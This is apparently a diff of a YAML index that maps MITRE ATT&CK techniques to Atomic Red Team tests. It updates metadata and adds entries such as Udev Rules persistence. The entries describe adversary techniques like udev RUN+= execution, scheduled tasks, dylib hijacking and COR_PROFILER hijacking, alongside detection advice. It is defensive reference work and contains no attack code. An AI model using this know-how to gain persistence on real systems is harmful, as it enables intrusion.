+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -23802,7 +24066,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -23905,9 +24168,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -23943,7 +24264,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23967,12 +24288,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24056,11 +24376,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24112,9 +24431,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24163,7 +24481,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24201,30 +24519,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24271,7 +24588,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24303,8 +24620,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24318,6 +24635,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24330,16 +24651,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24405,7 +24729,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24482,66 +24805,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24554,31 +24822,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24636,9 +24956,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -24730,20 +25049,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -24771,7 +25089,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -24791,33 +25109,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24834,6 +25132,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -24844,9 +25143,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -24854,8 +25157,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -24895,7 +25214,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -24920,12 +25239,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25005,11 +25322,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25069,12 +25385,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
